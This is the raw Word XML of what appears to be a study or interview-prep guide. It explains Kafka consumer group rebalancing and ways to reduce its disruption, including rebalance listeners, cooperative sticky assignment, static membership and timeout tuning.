      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="653EC4CB" w14:textId="77777777" w:rsidTr="00F4512C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36F35EC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3188B97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rol before and after rebalance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="2887968C" w14:textId="77777777" w:rsidTr="00F4512C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="341088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7940083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ss disruptive rebalances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="557FF1BF" w14:textId="77777777" w:rsidTr="00F4512C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A742D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4FBB0A1E"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ble partition assignment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="779230F5" w14:textId="77777777" w:rsidTr="00F4512C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="286A05D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nual offset commit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066F516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message loss/duplication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="2F85E20A" w14:textId="77777777" w:rsidTr="00F4512C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E6D19B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consumer lag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A808547"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slow consumers causing rebalances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42D62219" w14:textId="4206B75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513" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE6FF83" w14:textId="3E1B1AA3" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00956459" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="872" w:name="_Toc197868086"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kafka's consumer rebalance process and strategies for handling it when scaling out consumer groups</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="872"/>
    </w:p>
    <w:p w14:paraId="5D9DC167" w14:textId="589D02DB" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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Kafka's Consumer Rebalance Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0811695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e</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka refers to the process where </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition ownership</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is reassigned among consumers within a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 xml:space="preserve">. It ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>balanced workload</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when consumers </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>join, leave, or crash</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or when </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topics/partitions change</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F029E5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9F957">
          <v:rect id="_x0000_i3514" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4281863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en Rebalancing Happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E06A333"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joins</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAFD6B5"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leave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fails</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CCCF44"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w partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are added to the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07386B07"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ubscription changes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (new topics added or removed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6EA0D2"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F5227">
          <v:rect id="_x0000_i3515" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C5163"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Rebalance Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B062D"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group coordinator</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> detects a change in the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D8C390"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t </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pauses consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for all consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D355A3"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 xml:space="preserve"> to available consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36891E64"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are notified of their </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new partition assignments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455FA371"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w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resume</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing from the last committed offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010DF9FA"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AF69F3">
          <v:rect id="_x0000_i3516" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="103B89B8"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Problems With Frequent Rebalancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571F1D87"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service interruption</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (no message consumption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCA689"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tential </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message duplication</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loss</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if offsets aren't managed correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DB9DF"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d latency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E093A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06991">
          <v:rect id="_x0000_i3517" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C4561"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trategies to Handle Rebalance in Large-Scale Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E756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ConsumerRebalanceListener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FBB29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lement this listener to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFFE69D"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mit offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before partitions are revoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673EC3A3"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eek to specific offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on reassignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE443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List.of("topic"), new ConsumerRebalanceListener() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6904CFD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78A620F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ave offsets or cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C07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7CECD8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Assigned(Collection&lt;TopicPartition&gt; partitions) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AF02BE"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Restore offsets or state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08F8E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F42AE5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7C27C87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EB4CC">
          <v:rect id="_x0000_i3518" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D42CDFC"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Enable Cooperative Rebalancing (Kafka 2.4+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E4F21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CooperativeStickyAssignor to avoid full-stop rebalancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3829643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26F70486"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imal disruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D756164"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eeps </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition stickiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B263BEE"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incremental rebalancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D5E404"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4AB6C7">
          <v:rect id="_x0000_i3519" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C993D0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se Static Group Membership (Kafka 2.3+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC70BA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ssign a fixed ID to each consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68163A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37DB2C28"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rebalancing when consumer restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E39D844"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long-running</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stateful</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2A8B76"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9A67">
          <v:rect id="_x0000_i3520" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4734F0EE"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391"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="13CB8C7F" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="550BA3B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3A957C3A"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4AA8A9F8" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D9AC4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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73B3900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to detect consumer failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="028BBBF8" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="438D68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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22F3EB0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 frequency to broker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="202EA9A5" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45B6BF7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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EDBC55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allowed between poll calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="392EEF4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per tuning prevents </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>false rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to slow processing or missed heartbeats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589DD2C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A3E68">
          <v:rect id="_x0000_i3521" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB01C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tagger Consumer Startups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70708DC1"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mass rebalance by </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>staggering</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the start of multiple consumers—especially during </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>autoscaling</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB0A1E"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38F638">
          <v:rect id="_x0000_i3522" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BFF50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ptimize Partition Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C28802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enough partitions to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C98494"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lance workload</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFF9F5"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0254FDD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ule of thumb:</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w: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i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Number of partitions ≥ Number of consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A6EFB"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4AA565">
          <v:rect id="_x0000_i3523" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA0592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442"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="42E0036B" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E89AA20"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2506FD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7657E12D" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26EFF81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5F0C4F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e offset commits &amp; restores</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
